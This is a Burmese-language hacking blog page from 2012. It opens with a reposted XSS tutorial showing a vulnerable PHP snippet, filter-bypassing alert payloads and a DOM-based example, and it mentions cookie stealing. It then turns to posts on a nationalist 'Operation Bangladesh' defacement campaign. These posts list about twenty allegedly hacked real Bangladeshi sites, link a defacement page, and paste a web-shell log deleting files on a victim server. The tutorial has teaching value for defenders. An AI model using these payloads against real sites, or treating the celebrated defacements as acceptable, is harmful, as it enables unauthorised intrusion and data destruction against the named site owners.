XSS ဆိုတာ Cross-site Scripting လုိ႕ေခၚတဲ့ Web Application Vuln တစ္မ်ိဳးျဖစ္ျပီး အစကေတာ့ CSS လို႕ေခၚၾကပါတယ္ ေနာက္ပိုင္း Cascading Style Sheet နဲ ေရာေနတဲ့အတြက္ XSS လို႕ေျပာင္းလဲေခၚေ၀ၚၾကတာျဖစ္ပါတယ္ ။ Web Master ရဲ႕ Filter လုပ္မထားေသာ Input Vulnerability မွတစ္ဆင့္ Html ႏွင့္ Java Script မ်ား Inject လုပ္ကာ User မ်ား၏ Web Browser မ်ားကို အဓိကထားတုိက္ခိုက္ၾကပါသည္ ။ တကယ္ေတာ့ XSS မွာ Attacker ဟာ Browser ကိုတိုက္ခိုက္တာပါ ။ Web Server ကိုမဟုတ္ပါဘူး ။ Vuln ျဖစ္ေနေသာ Web Server မွတစ္ဆင့္ Suffer လုပ္သူ User မ်ား၏ Browser ထဲမွ Data မ်ားကို ရယူရန္ ႏွင့္ Worm မ်ားထည့္သြင္းရန္ Trojan မ်ားကူးစက္ရန္ Phishing လုပ္ရန္ စီစဥ္ျခင္းျဖစ္ပါသည္ ။
XSS ျခိမ္းေျခာက္မႈ ဇယားကို CEH မွ ကူးယူတင္ျပထားျခင္းျဖစ္ပါသည္ ။


Understanding XSS

Code
<?php
$name=$_GET['name'];
print $name;
?>
အဲ့ဒီ့မွာ Input ကို Filter လုပ္ထားျခင္းမရွိပါ ။ ဒါေၾကာင့္ User Input လုပ္ခြင့္ရတဲ့တစ္ေနေနရာရာ ဥပမာ Search Box လိုေနရာမ်ိဳးမွာ
“><SCRIPT>alert(‘XSS%20Testing’)</SCRIPT>  လို႕ရိုက္လိုက္ရင္ Pop Up Window နဲ႕ XSS လုိ႕ေပၚလာမွာျဖစ္ပါတယ္  ( “><SCRIPT>alert(‘XSS%20Testing’)</SCRIPT>  ) လို႕ေရးရတဲ့အေၾကာင္းအရင္းကေတာ့ တခ်ိဳ႕ေသာ Website မ်ားမွာ <script>alert(“XSS”)</script> လို Code မ်ိဳး Inject လုပ္မရေအာင္ Filter လုပ္ထားတာကို ေက်ာ္ဖို႕ပါ ဒါကေတာ့ အၾကမ္းဖ်င္းေပါ့ေနာ္ ေနာက္ပိုင္းေတြမွ ပဲ အေသးစိတ္ေရးေပးပါ့မယ္ )




URL မွာေတာ့ ဒီလိုေပါ့ေနာ္
http://website.com/test.php?name=<script>alert(“XSS”)</script>
ခုနကလို “><SCRIPT>alert(‘XSS%20Testing’)</SCRIPT> လို႕ရိုက္သြင္းလိုက္တဲ့ Script ဟာ Input Filter လုပ္မထားေသာ Web Server ထဲသို႕ Value တစ္ခုအျဖစ္၀င္သြားသည္ကို ေအာက္ပါ အတုိင္း HTML Source ျဖင့္ၾကည့္ႏိုင္သည္ ။




ဒါဆိုရင္ အျခားေသာ Script မ်ားကိုလည္း Inject လုပ္တိုက္ခိုက္ႏိုင္ပါျပီ

Types of Vulnerabilities

1.Persistent XSS
2.Non Persistent XSS
3.Dom-Based XSS
1.Persistent XSS
Persistent XSS ေခၚ Stored XSS တြင္မူ Attacker Input လုပ္လုိက္ေသာ Inject Code မ်ားကို Web Server ထဲတြင္ သိမ္းဆည္းထားျပီး User မ်ားယင္း Page သို႕၀င္ေရာက္တုိင္း ယင္း Script သည္ အလိုလို အလုပ္လုပ္ေနမည္ျဖစ္သည္ ။
ဥပမာ - Forum တစ္ခုတြင္ User Feedback ေနရာ၌ XSS Vuln ျဖစ္ေနမည္ဆိုပါစို႕ ။ ထိုအခါ Attacker က ယင္းေနရာတြင္ User စိတ္၀င္စားမႈရွိေသာ ေခါင္းစဥ္ေပး၍ ( Example : Hey , I found a new error CHECK IT!!! ) User အားျမဴစြယ္ကာ ယင္း Page တြင္ Code Inject လုပ္ထားမည္ျဖစ္သည္ ။ ထိုအခါ အျခား User မ်ားယင္း Page သို႕ေရာက္ရွိတုိင္း Inject Code က အလုပ္လုပ္ေနမည္ျဖစ္သည္ ;-) )
2.Non Persistent XSS
Reflected XSS လုိ႕လည္း လူသိမ်ားတဲ့ Non Persistent XSS Vulnerability မွာ Attacker Inject လုပ္လိုက္တဲ့ Code ဟာ Web Server ထဲမွာသိမ္းဆည္းထားမွာမဟုတ္ပါဘူး Http Request မွ တစ္ဆင့္သာ Inject လုပ္ေသာ Code မ်ားကို Server သုိ႕ေပးပို႕မည္ျဖစ္သည္ ။
ဥပမာအားျဖင့္ဆိုရေသာ္ Website တစ္ခုရွိ Search Box တြင္ User ရွာေသာ Input မ်ားကို သိမ္းဆည္းထားျခင္းမရွိပဲ Result ျပျပီးလွ်င္ ဖ်က္သိမ္းသြားမည္ျဖစ္သည္ အကယ္၍ ယင္းေနရာတြင္ User Input FILTER လုပ္မထားပါက ႏွစ္သက္ရာ Code မ်ား Inject လုပ္သြားႏုိင္မည္ျဖစ္သည္ သို႕ေသာ္လည္း Web Server ထဲတြင္ သိမ္းဆည္းထားမည္မဟုတ္ေပ သို႕ျဖစ္၍ Attacker က Inject လုပ္ထားေသာ Page သို႕မေရာက္ေရာက္ေအာင္ ျမဴဆြယ္ရမည္ျဖစ္သည္ ။ ဥပမာ Cookies Stealing လုပ္မည္ဆုိပါက ယင္း Cookies Stealer ဆီသို႕မေရာက္ေရာက္ေအာင္ Link ကို နည္းမ်ိဳးစံု ျမဴဆြယ္၍ User Click ေအာင္ေဆာင္ရြက္ရမည္ျဖစ္သည္ ။ အကယ္၍ User ကသာ Click လိုက္ပါက Browser က Inject လုပ္ထားေသာ Code အတုိင္း Server သို႕ေပးပို႕မည္ျဖစ္ျပီး Server မွာ Attacker သို႕ဆက္လက္ေပးပို႕မည္ျဖစ္သည္ ။ ထို႕ေၾကာင့္ Reflected XSS ဟုုေခၚျခင္းျဖစ္သည္ ။ အေတြ႕ရအမ်ားဆံုး XSS Vuln လည္းျဖစ္သည္ ။
3.Dom-Based XSS
Dom ဆိုတာ HTML ႏွင့္ XML Language မ်ားအားကိုယ္စားျပဳသည့္ Object မ်ားကို define လုပ္ေပးသည့္ W3c ၏ စံညႊန္းတစ္ခုျဖစ္ပါတယ္ ။ ( XML Language မွာ SAX နဲ႕ Dom ဆိုျပီး Parser ႏွစ္ခုရွိတဲ့အနက္မွာ SAX ကေတာ့ ျမန္တယ္ ေပါ့ပါးတယ္ သို႕ေသာ္လည္း document node ေတြဘက္ကိုျပန္သြားဖို႕မလြယ္လွတာေၾကာင့္ ယေန႕ Browser ေတြမွာ DOM Parser ကုိအသံုးျပဳၾကပါတယ္ ( ဒါက Dom ဆိုတာ ဘာမွန္းသိေအာင္ေျပာတာပါ )
Local Based XSS လို႕ေခၚတဲ့ Dom Based XSS မွာေတာ့ ေပါက္တာျခင္းက User ဆီကိုတိုက္ခိုက္ဖို႕ script ေတြကို Persistent လို stored လုပ္ထားဖို႕လည္းမလုိသလို non-persistent လိုလည္း webserver မွတစ္ဆင့္ reflected လုပ္ဖို႕မလိုပါဘူး ဒါဆုိ ဘယ္လိုျဖစ္တာလဲဆိုတာနည္းနည္းေျပာပါ့မယ္ ဥပမာ ecommerce site တစ္ခုဆိုပါစို႕ www.store.com ေပါ့ သူ႕မွာ စာအုပ္ေရာင္းတဲ့ Catagory တစ္ခုရွိပါတယ္ www.store.com/books ေပါ့ တကယ္လုိ႕သာ ကၽြန္ေတာ္တို႕က ဆယ္အုပ္ပဲက်န္ေတာ့တဲ့ စာအုပ္ကို ရွာခ်င္တယ္ဆိုပါစို႕ ဒါဆို www.store.com/books?product_id=100&title=Only+10+Left! ဆိုျပီး ရွာခြင့္ရွိပါ့မယ္ ဒီလိုရိုက္လို္က္ရင္ ,if; html Page မွာ Java Script တစ္ခု အလိုအေလ်ာက္သြားေရးသြားပါလိ္မ့္မယ္
<script>
var url = window.location.href;
var pos = url.indexOf(“title=”) + 6;
var len = url.length;
var title_string = url.substring(pos,len);
document.write(unescape(title_string));
</script>
ဒီလိုေပါ့ အဲ့ဒီ့မွာကြိဳင္တာပဲ
တကယ္လို႕ product_id ဆိုတဲ့ Input Method ကိုသာ input Filter လုပ္ထားဘူးဆိုရင္ www.store.com/books??product_id=100&title=Foo#<SCRIPT>alert(‘XSS’) </SCRIPT> လုိ႕ရိုက္လိုက္ရင္ XSS Alert တက္လာပါလိမ့္မယ္ ( သူက non-persistent XSS နဲ႕ပိုတူတာေတြ႕ရပါလိမ့္မယ္ ) :-) ဒီ Dom Based မွာ အျခား မည့္သည့္ Web ေပၚမွာ အရာကို မဆို ခ်ိတ္လုိ႕ရပါတယ္ တကယ္လုိ႕ src နဲ႕ javascript Malware ကိုသာ ခ်ိတ္လိုက္မယ္ဆိုရင္ ;-)
Dom Based XSS မွာေတာင္
1.Persistent Dom-Based XSS နဲ႕
2.Non-Persistent Dom-Based XSS ဆိုျပီး ႏွစ္မ်ိဳးရွိပါေသးတယ္ ။

Post By Negative Thunder  (Ghost Area)
P.s: ဒီပိုစ့္ေလးက တကယ္ေကာင္းလို႕ ျပန္တင္ေပးလိုက္ပါတယ္......။
Read More ->>

Happy New Year For All Myanmar


ဒီပိုစ့္ေလးက ဘာမွေတာ့ဟုတ္ပါဘူး......ကၽြန္ေတာ္တို႕ ျမန္မာႏွစ္ကူးအခါ မဂၤလာအခ်ိန္ေလးမွာ ျမန္မာ ျပည္သားအေပါင္း ေပွ်ာ္ရႊင္ျခင္းက်န္မားျခင္းမ်ားႏွင့္ျပည့္စံု ႏိုင္ပါေစေၾကာင္း
ဆုေတာင္းေပးခ်င္လို႕ပါ.......။
ေနာက္ျပီး Hacking ကိုျမတ္ႏီုးသူခ်စ္တဲ့သူတိုင္း ႏွစ္ကူးအခ်ိန္အခါေလးအတြင္းမွာ....ယခင္းအခ်ိန္မ်ားထက္ အဆ 1000 အဆ 10000 ေပွ်ာ္ရႊင္းစရာမ်ားႏွင့္ၾကံဳ ႏီုင္ပါေစ လို႕ ကၽြန္ေတာ္ ဘာမွ မတတ္ေသာ ေရႊကိုယ္ရံေတာ္ မွဆုေတာင္း ေပးအပ္ပါတယ္......။

အားလံုးေသာ ျမန္မာျပည္သူမ်ား ကိုယ္စိတ္ႏွစ္ျဖာ က်န္မာ ရႊန္လန္းၾကပါေစ.........။။။။။။





။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။။

                          ။။။           ။။။
                       ။။။       ။။        ။။။
                      ။။                     ။။
                        ။။                ။။
                           ။။          ။။
                               ။    ။
                                ။။
Read More ->>

Finish Operation Bangladesh


ေရပိုင္နက္အျငင္းပြားမႈနဲ႔ပတ္သက္ျပီး Myanmar Hackers Unite4m မွဆင္ႏြဲခဲ႔တဲ႔ Operation Bangladesh ကို အရႈံးအႏိူင္မရွိ အဆံုးသတ္ပါျပီ...

ကၽြန္ေတာ္တို႔ အေနနဲ႔ Operation Bangladesh က္ို March27 ,2012 မွာ ဘဂၤလားေဒ႔ရွ္ဆိုဒ္ေတြကို စတင္တိုက္ခိုက္ျပီး စတင္ခဲ႔ပါတယ္...Bangladesh ဖက္ကလည္း ေအာက္ပါအတိုင္း သူတို႔ရဲ႔ facebook page မွာျပန္လည္ေၾကညာခဲ႔ပါတယ္....

Greetings to the People of Myanmar and Bangladesh...


We are Bangladesh Cyber Army. The first and biggest hacking group of Bangladesh. As you all know, we are already in a state of war against India. We mentioned some of our demands. But now, another problem has showed up. This time, a hacking group of Myanmar with the name- "My@nm@r H4ck3rs Unite4m" has started attacking Bangladeshi websites. Being the main hacking group of the country, we cannot stand back and just see our country's websites being hacked. Therefore, this message goes to the hacking team who are engaged in any type of attack against Bangladeshi cyber space-


"THIS IS THE LAST WARNING! STAND BACK RIGHT NOW. YOU HAVE SEEN WHAT HAPPENED TO INDIA ALREADY. IF YOU STILL CONTINUE YOUR ATTACKS, YOU WILL FACE THE SAME OUTCOME".


Firstly, YOU HAVE ATTACKED OUR CYBER SPACE...

Secondly, THE REASON YOU SHOWED IS INVALID. It is completely illogical if you say Bangladesh is getting more profit regarding the sea-borders. We deserve more than we actually get and besides, it is Myanmar who are taking the major profits there. Get your logic right first!


We will not tolerate any type of attack. Stand back while you still can. If you create any further problem, the results will be severe.


United as a single ONE,

Divided by ZERO.

Our work is for our country,

Our fight is for humanity.

We Work for Justice.


We are,

Bangladesh Cyber Army.


Myanmar,


ကိုယ္႔ဖက္ တစ္ဖက္ထဲလည္း ၾကည္႔လို႔မရပါဘူး...တစ္ဖက္က ေျပာၾကားခ်က္ကလည္း အက်ိဳးအေၾကာင္းညီညြတ္တာကို သတိထားမိရင္ သိရွိႏိူင္ၾကပါတယ္....

ကၽြန္ေတာ္တို႔အေနနဲ႔လည္း Cyber War ကို မလိုလားေၾကာင္းကို facebook ကေနတစ္ဆင္႔ Bangladesh Cyber Army ရဲ႔ admin ျဖစ္တဲ႔ Shadman Tanjim ကို facebook ကေနတစ္ဆင္႔ ေအာက္ပါ message ကိုေပးပို႔ခဲ႔ပါတယ္....

Hello!
Dear the admin of Bangladesh Cyber Army!

This's message from My@nm@r Hack3rs Unite4m.
Today we got your message on facebook. Firstly, we want to say you Thanks coz of your message is acceptalbe and resonable. Actually we don't want Cyber War Between Myanmar and Bangladesh.
We also love peace . We can accept your message and negotiation.
There is something we want you, all people from Bangladesh, to know ...
First - We attacked Bangladeshi sites for the major reason of unacceptable Sea-Border dispute, but these attacks were since being when the maritime problem between Myanmar and Bangladesh was started happen.
Now, we don't continue attack your Cyber Space!

Second - And also there is one thing let you know! We have also got reaction from one hacker from Bangladesh who named, " Annihilat0r_BD " who hacked myanmarhost.com. You can check the proof of screen  from here.

http://ghostarea.net/wp-content/uploads ... 24x575.png

Third - All of our Cyber Space is vunlerable and all of them have been already hacked by other hackers.
Fourth - There was our Cyber Space is alittle.

What we want?
Just we want four points to know to your governmet. That's.......
1) We stand for our Land
2) We love Justice!
3) We love our Natural Resources.
4) We hate the greed of your government.

Regards.....
My@nm@ar Hack3rs Unite4m

=========================================



Bangladesh ဖက္ကလည္း Cyber War ကို အလိုမရွိေၾကာင္းကို BCA ရဲ႔ admin ကလည္း ေအာက္ပါအတိုင္းအေၾကာင္းျပန္ခဲ႔ပါတယ္....

Many Many thnx for your Message [:D] .. This is very good, u guys want peace. And I also think, Cyber War is not a good way for your demands , because this things is now in international court , so in bangladesh no one can help u. [:)] ..And I let u know, in bangladesh Maximum people say's Bangladesh also a loser, we also lose our natural resource , so it's really confusing, what is actually doing in this case. hope u guys understand. And Please Don't hack bangladeshi sites again. I think this case in now finish. So hope u guys don't hack bangladeshi sites again. Well Many Many thnx Again. See u, good bye [:D]


ဒါေၾကာင္႔မို႔ Cyber War အျဖစ္တျဖည္းျဖည္းတင္းမာလာေနတဲ႔ ျမန္မာ နဲ႔ ဘဂၤလားေဒ႔ရွ္ ႏွစ္ႏိူင္ငံအေျခအေနကို ျပန္လည္ထိန္းသိမ္းထားႏိူင္လိုက္ပါျပီ....

source By MMhackforums.noonhost.com
Read More ->>

Saturday, April 14, 2012

My New Defacing Page


ကၽြန္ေတာ္အသစ္ျပန္လုပ္ထားတာ..ကိုယ္ပိုင္ညဏ္ေတာ့ဟုတ္ဘူးရယ္ အဆင္ေျပသလို ဟိုစစ ဒီစစ ယူထားတာ....။ေအာက္မွာ Demo Link...ေပးထားတယ္.ၾကည့္ခ်င္ရင္၀င္ ၾကည့္ႏိုင္ပါသည္.....။

Demo Link: http://pastehtml.com/view/bupk3rgui.html
Read More ->>

Friday, April 13, 2012

Start cyber war Myanmar & BD


ျမန္မာႏွင့္ဘဂၤလားေဒ့ေရပိုင္နက္အေရးကိုအကုန္သိရိွၾကမွာပါ..ျမန္မာဘက္က ေပးလိုက္ရပါတယ္..
က်ေနာ္တို႔ေျမအက်ဴး.ေက်ာ္ခံတာ
ဘယ္ျမန္မာနိင္ငံသားမွမခံပါဘူး...ဒါေၾကာင့္ ျမန္မာ hacker မ်ားစုေပါင္းျပီး...ဘဂၤလားေဒ့ ဆိုဒ္မ်ားကို hack
ျပီး တံု႔ ျပန္ခဲ့ပါတယ္...ဒီအေၾကာင္းေတြကို အစံုအလင္သိခ်င္ရင္ MHF http://mmhackforums.noonhost.com/operation-bangledesh-vf40.html မွာၾကည့္ရူနိင္ပါတယ္....ဆိုဒ္ေတာ္ေတာ္မ်ားမ်ား ကို hack နိင္ခဲ့ပါတယ္...
ဒီအထဲကတစ္ခုကိုၾကည့္ၾကည့္ပါ... http://falahiamadrasah.edu.bd/ ........
BD Operation ကိုက်ေနာ္တို႕ ရုပ္သိမ္း
မည့္အခ်ိန္တြင္..ဘဂၤလားေဒ့ ဘက္မွ တုန္႔ျပန္မူေတြထြက္ေပၚလာပါတယ္... http://myanmarhost.com/ ကို hack
သြားပါတယ္...ဒါေၾကာင့္ BD Operation ကိုျပန္လည္အသက္သြင္းပါျပီ...ဆိုဒ္အသီးသီးမွ admin မ်ားအေနျဖင့္ ဘဂၤလားေဒ့ ဘက္မွ တုံ႔ ျပန္မူေတြဆက္လက္ရိွလာပါျပီ ။ဒါေၾကာင့္ မိမိ ဆိုဒ္မ်ားအား...Security...အျမင့္ဆံုးထားၾကပါရန္
တိုက္တြန္းအပ္ပါတယ္...
ျမန္မာျပည္တြင္းျပည္ပမွာ ရွိတဲ႔ hacking ေလာကကႏႈတ္ထြက္သြားၾကတဲ႔ အနားယူသြားၾကတဲ႔ ျမန္မာပညာရွင္အေပါင္းကိုလည္း ပူးေပါင္း ပါဝင္ၾကဖုိ႔ ဖိတ္ေခၚအပ္ပါသည္ ။ ျမန္မာျပည္ အေရး ျဖစ္သည္႔ အတြက္ေၾကာင္႔ ကြ်န္ေတာ္တုိ႔ႏွင္႔ အတူတကြပူးေပါင္း ပါဝင္ဆင္ႏႊဲၾကလိမ္႔မည္ဟုလည္း ယုံၾကည္ပါသည္....
ဒီ post ေလးကို ဆိုဒ္အသီးသီးမွာ ျပန္လည္ မွ်ေ၀ေပးေစခ်င္ပါတယ္...က်ေနာ္တို႕ျမန္မာေတြအားလံုးစည္းလံုးဖို႕အခိ်န္က်ေရာက္လာပါျပီ..ေ၇ပိုင္နက္
အေရးမွာက်ေနာ္တို႔မစြမ္းသာေပမယ့္...cyber war ...မွာက်ေနာ္တို႕ ျမန္မာေတြ ေအာင္ပြဲခံၾကတာေပါ့.........
ဆိုဒ္ adminမ်ားအေနျဖင့္ မိမိဆိုဒ္လံုျခံုေရးမ်ား..လိုအပ္လာလွ်င္ နားလည္ကြ်မ္းက်င္ေသာပညာရွင္မ်ားကိုအကူညီေတာင္းသင့္ပါတယ္... MHF http://mmhackforums.noonhost.com/ တြင္လည္း..သင္တို႕အေနျဖင့္ အကူညီေတာင္းခံနိင္ပါတယ္..



"Some BD site hack by MHF"
===========================
http://www.maksonsltd.com/
http://www.bgfcbd.com/
http://www.jonsondicon.com/
http://bist.edu.bd/
http://www.bctbd.com/
http://falahiamadrasah.edu.bd/
http://www.thepracticebd.com/images/MHU.html
http://www.bananibidyaniketan.edu.bd/
http://modelsgallerybd.com
http://www.makestate.com/
http://kutirnirman.com/
http://www.swacu98.org/
http://earndollar.net
http://www.nondonfood.com/
http://tempelats4you.com
http://yousufahmedtuhin.com/
http://erangpurchitra.com
http://ufc133livestream.co.cc/
http://www.erangpurchitra.com
http://www.bananibidyaniketan.edu.bd/home.php

ေလးစာစြာျဖင့္
post By ny4t.t33
Read More ->>

Thursday, April 12, 2012

Tuesday, April 10, 2012

Tw0 bangledesh sites hackeD


http://www.islamictv.com.bd/index.php?page=show_video&id=49
http://www.erangpurchitra.com
http://erangpurchitra.com/ad/

Uploaded shell.
Deleted index.php...
Deleting dir /home/erangpur/public_html/admin/img...
Deleted login-button.jpg...
Deleted logout.png...
Deleted 3.png...
Deleted 1.png...
Deleted Untitled-2_03.gif...
Deleted 2.png...
Deleted load.gif...
Deleted login_bg.jpg...
Deleted Untitled-2_06.png...
Deleted more-info-icon.gif...
Deleted security_icon.gif...
Deleted lock-icon.png...
Deleted User-icon.png...
Deleted poll.php...
Deleted logout.php...
Deleted error.php...
Deleted error_log...
Deleted checklogin.php...
Total files deleted: 19; failed to delete 0 files






Ref:mmhackforums.noonhost.com
Read More ->>

ROCK FOREVER (MUSIC)

Pageviewers

CBOX

Manutd-Results

Label

Android (3) autorun (3) Backtrack (8) batch file (19) blogger (10) Botnet (2) browser (5) Brute Force (6) cafezee (2) cmd (5) Cookies (2) crack (12) Cracking (2) crypter (7) DDos (20) deepfreeze (4) defacing (1) defence (16) domain (4) Dos (9) downloader (4) ebomb (2) ebook (48) Exploit (26) firewall (3) game (2) gmail (11) google hack (16) Hacking Show (3) Hash (4) hosting (1) icon changer (1) ip adress (6) Keygen (1) keylogger (8) knowledge (67) locker (1) maintainence (8) network (17) news (31) other (35) passwoard viewer (7) password (12) Philosophy (6) Phishing (8) premium account (2) proxy (7) RAT (10) run commands (4) script (27) Shell code (10) shortcut Key (2) SMTP ports (1) social engineering (7) spammer (1) SQL Injection (30) Stealer.crack (5) tools (125) Tools Pack (4) tutorial (107) USB (3) virus (32) website (84) WiFi (4) word list (2)

Blogger templates

picoodle.com

Blogger news

Print Friendly and PDF

HOW IS MY SITE?

Powered by Blogger.

Blog Archive

Followers

About Me

My Photo
Hacking= intelligent+techonology+psychology